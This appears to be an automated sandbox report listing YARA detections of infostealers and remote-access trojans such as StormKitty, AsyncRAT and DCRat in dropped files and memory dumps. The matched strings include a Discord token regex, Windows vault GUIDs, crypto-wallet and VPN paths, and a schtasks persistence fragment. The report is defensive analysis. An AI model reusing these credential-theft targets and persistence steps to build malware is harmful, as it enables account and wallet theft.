C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25663:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2773f:$s1: \VPN\NordVPN 0x27725:$s2: \VPN\OpenVPN 0x27707:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x25e9b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x25f0d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x25f97:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x26029:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x26093:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x26105:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2619b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2622b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x11f8c:$x3: StormKitty 0x1b6ca:$s1: GetBSSID 0x1b5ca:$s2: GetAntivirus 0x26b4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x26d7d:$s6: "encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47754:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x4a797:$s1: \VPN\NordVPN 0x4a83b:$s1: \VPN\NordVPN 0x4a8fb:$s2: \VPN\OpenVPN 0x4a969:$s3: \VPN\ProtonVPN
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa90:$x2: https://github.com/LimerBoy/StormKitty 0xaac:$x3: StormKitty 0x37ea3:$s1: GetBSSID 0x3e928:$s2: GetAntivirus 0x49b8e:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x4b5f9:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x4b82b:$s6: "encrypted_key":"(.*?)"
C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe	MALWARE_Win_A310Logger	Detects A310Logger	ditekSHen	0x475a5:$s6: Content-Disposition: form-data; name="document"; filename=" 0x4ac67:$s11: \Ethereum\keystore 0x45ca2:$v1_5: sharedSecret 0x4889c:$v1_6: ":"([^"]+)" 0x3d9ae:$v1_8: WritePasswords 0x3e1d1:$v1_9: sGeckoBrowserPaths 0x39526:$v1_10: get_sPassword
Click to see the 52 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x91eb:$x1: AsyncRAT 0x9229:$x1: AsyncRAT 0x9b23:$x1: AsyncRAT 0x9b61:$x1: AsyncRAT 0xa837:$x1: AsyncRAT 0xa875:$x1: AsyncRAT
00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x530d2:$s1: file:/// 0x52fda:$s2: {11111-22222-10009-11112} 0x53062:$s3: {11111-22222-50001-00000} 0x4d4fc:$s4: get_Module 0x4d9bb:$s5: Reverse 0x52991:$s6: BlockCopy 0x52ad4:$s7: ReadByte 0x530e4:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000013.00000000.1935087181.0000000000622000.00000002.00000001.01000000.00000017.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000018.00000002.3188525129.0000000005100000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1763:$x1: AsyncRAT 0x17a1:$x1: AsyncRAT 0x8b7a:$s8: Win32_ComputerSystem
00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47847:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000018.00000002.3174046241.0000000003807000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000018.00000002.3152328073.00000000029C5000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x3017:$x1: AsyncRAT 0x3055:$x1: AsyncRAT 0x351b:$x1: AsyncRAT 0x3559:$x1: AsyncRAT
00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1325e:$s2: ReflectiveLoader@
0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000013.00000002.3142832732.00000000027C1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x29e09f:$b2: DcRat By qwqdanchun1
00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_KeyzetsuClipper	Yara detected Keyzetsu Clipper	Joe Security
0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x17457:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x18834:$a2: Stub.exe 0x188c4:$a2: Stub.exe 0x140e4:$a3: get_ActivatePong 0x1766f:$a4: vmware 0x174e7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x14e85:$a6: get_SslClient
00000020.00000002.2548612553.0000000002897000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_KeyzetsuClipper	Yara detected Keyzetsu Clipper	Joe Security
00000012.00000002.2045157680.0000000000787000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x35f1b:$x1: AsyncRAT 0x35f59:$x1: AsyncRAT
0000002D.00000002.2707163319.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1d8d7:$x1: AsyncRAT 0x1d915:$x1: AsyncRAT
00000013.00000002.3187954223.000000001B234000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x305f:$b2: DcRat By qwqdanchun1
0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000018.00000002.3207543510.0000000006A20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47634:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000002.00000000.1786621795.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1325e:$s2: ReflectiveLoader@
00000020.00000002.2548612553.00000000028A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_KeyzetsuClipper	Yara detected Keyzetsu Clipper	Joe Security
0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa0ed:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000018.00000002.3217843417.0000000006D60000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.2061125065.0000000000E39000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xb493:$x1: AsyncRAT 0xb4d1:$x1: AsyncRAT
00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3b62a:$s2: ReflectiveLoader@
00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x11fe6:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2e40f:$x1: AsyncRAT 0x2e44d:$x1: AsyncRAT 0xebf4:$s6: VirtualBox 0xeb0c:$s8: Win32_ComputerSystem
0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x47554:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0000002D.00000002.2773682295.0000000005D77000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4edb:$x1: AsyncRAT 0x4f19:$x1: AsyncRAT
00000002.00000000.1786520032.0000000008B90000.00000020.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1245e:$s2: ReflectiveLoader@
00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3a02a:$s2: ReflectiveLoader@
00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x322d0:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x61c6f:$x1: AsyncRAT 0x61cad:$x1: AsyncRAT
00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1880:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000018.00000002.3152328073.00000000029CD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_KeyzetsuClipper	Yara detected Keyzetsu Clipper	Joe Security
0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xb3aa:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x196f:$x1: AsyncRAT 0x19ad:$x1: AsyncRAT 0x3f7c:$s6: VirtualBox 0x3e94:$s8: Win32_ComputerSystem 0x8640:$s8: Win32_ComputerSystem
0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x39650:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x28ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25463:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x411b:$x1: AsyncRAT 0x4159:$x1: AsyncRAT
00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x24af:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x1245e:$s2: ReflectiveLoader@
00000002.00000000.1790427329.000000000C350000.00000040.00000001.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3a02a:$s2: ReflectiveLoader@
00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7ec0b:$x1: AsyncRAT 0x7ec49:$x1: AsyncRAT 0xb148f:$x1: AsyncRAT 0xb14cd:$x1: AsyncRAT
00000012.00000002.2071994361.0000000002261000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1d96f:$x1: AsyncRAT 0x1d9ad:$x1: AsyncRAT
00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_MicroClip	Yara detected MicroClip	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
Process Memory Space: explorer.exe PID: 2580	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: explorer.exe PID: 2580	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0xc2542:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: 3CBD.tmp.Installer.exe PID: 6828	JoeSecurity_KeyzetsuClipper	Yara detected Keyzetsu Clipper	Joe Security
Process Memory Space: 4336.tmp.Server.exe PID: 5720	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: 4336.tmp.Server.exe PID: 5720	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: 4336.tmp.Server.exe PID: 5720	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: 4336.tmp.Server.exe PID: 5720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 4336.tmp.Server.exe PID: 5720	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 4336.tmp.Server.exe PID: 5720	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x6c36a:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: 4336.tmp.Server.exe PID: 5720	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x51598:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x6ae88:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: 476D.tmp.Server.exe PID: 420	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: 476D.tmp.Server.exe PID: 420	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: 476D.tmp.Server.exe PID: 420	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: 476D.tmp.Server.exe PID: 420	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 476D.tmp.Server.exe PID: 420	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 476D.tmp.Server.exe PID: 420	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x414e5:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: 4BC4.tmp.Client.exe PID: 7244	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: 4BC4.tmp.Client.exe PID: 7244	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 4BC4.tmp.Client.exe PID: 7244	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: 4BC4.tmp.Client.exe PID: 7244	JoeSecurity_RLSTEALER	Yara detected RL STEALER	Joe Security
Process Memory Space: 4BC4.tmp.Client.exe PID: 7244	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x4e9ca:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x7d1d1:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: accc.exe PID: 7324	JoeSecurity_KeyzetsuClipper	Yara detected Keyzetsu Clipper	Joe Security
Process Memory Space: 5087.tmp.update.exe PID: 7408	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: 5087.tmp.update.exe PID: 7408	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x95aa:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x340b3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x378d0:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: 5087.tmp.update.exe PID: 7408	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2c480:$x1: AsyncRAT 0x2c4b2:$x1: AsyncRAT 0x36399:$x1: AsyncRAT 0x363cb:$x1: AsyncRAT 0x9670:$s6: VirtualBox 0x34179:$s6: VirtualBox 0x3689e:$s6: VirtualBox 0x9623:$s8: Win32_ComputerSystem 0x1f51f:$s8: Win32_ComputerSystem 0x23cec:$s8: Win32_ComputerSystem 0x25361:$s8: Win32_ComputerSystem 0x3412c:$s8: Win32_ComputerSystem 0x3684d:$s8: Win32_ComputerSystem 0x37588:$s8: Win32_ComputerSystem 0x3be3f:$s8: Win32_ComputerSystem 0x3be54:$s8: Win32_ComputerSystem 0x3be7e:$s8: Win32_ComputerSystem 0x3c7d3:$s8: Win32_ComputerSystem 0x3c8ee:$s8: Win32_ComputerSystem 0x3dc66:$s8: Win32_ComputerSystem
Process Memory Space: 53A5.tmp.update.exe PID: 7508	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x58e2:$x1: AsyncRAT 0x5914:$x1: AsyncRAT 0x1854b:$x1: AsyncRAT 0x1857d:$x1: AsyncRAT
Process Memory Space: 5E16.tmp.aaa.exe PID: 7640	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: 5E16.tmp.aaa.exe PID: 7640	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0xa43a:$a1: havecamera 0x1b4a6:$b2: DcRat By qwqdanchun1 0x1dee0:$b2: DcRat By qwqdanchun1
Process Memory Space: 62AB.tmp.build.exe PID: 7672	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
